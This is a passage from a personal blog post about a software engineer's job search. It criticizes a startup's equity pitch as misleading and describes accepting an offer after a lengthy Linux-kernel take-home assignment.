recruiter kept emphasizing the equity, and showing me these spreadsheets with
huge numbers, talking about how the equity would be worth millions under their
five year plan. <a href="https://blend.com/blog/news/announcing-ipo/">Blend announced their IPO last month.</a>
The equity would have been worthless, and their executives knew that. They were
enticing engineers with huge equity packages on a one year cliff they knew they’d
never have to deliver on. Incredibly shady, and I’m glad I didn’t take this offer.
I had friends who had worked at other startups advise me that any startup equity
is basically worthless, and to treat it as a lottery ticket.</p>
<p>I’d love to work with these humans, but not for this company.</p>
<h1 id="red-canary">Red Canary</h1>
<p>This had the same kind of process as Blend and Twilio, but with a take-home
assignment instead of a live assignment. This was the most time-consuming
take-home assignment, but it was also the one that excited me the most. I’ve
told friends, “my dream job is getting paid to mess around in the Linux kernel,”
and that’s basically what they were offering me.</p>
<p>I know people say not to normalize long take-home interview assignments, since
they can be abusive. However, I was too intrigued by the premise of these
assignments to turn them down. I honestly couldn’t stop thinking about them, and
felt like I really wanted to do them anyway. I told them during the interview
that if this is reflective of the day-to-day work, they’d have to remind me
to take time off (which, as it turns out, my manager has had to do). I ultimately
accepted an offer here.</p>
<p>So I’d say if you do get a lengthy take-home assignment, at least see what it’s
about before rejecting it out of hand. You might like it!</p>Friday OrtizIt’s been long enough that I’d like to document my job search and interview process at a high level, hopefully for the benefit of others. If you’d like to understand the position I was in before the job search, you can look at my previous experiences on my CV page.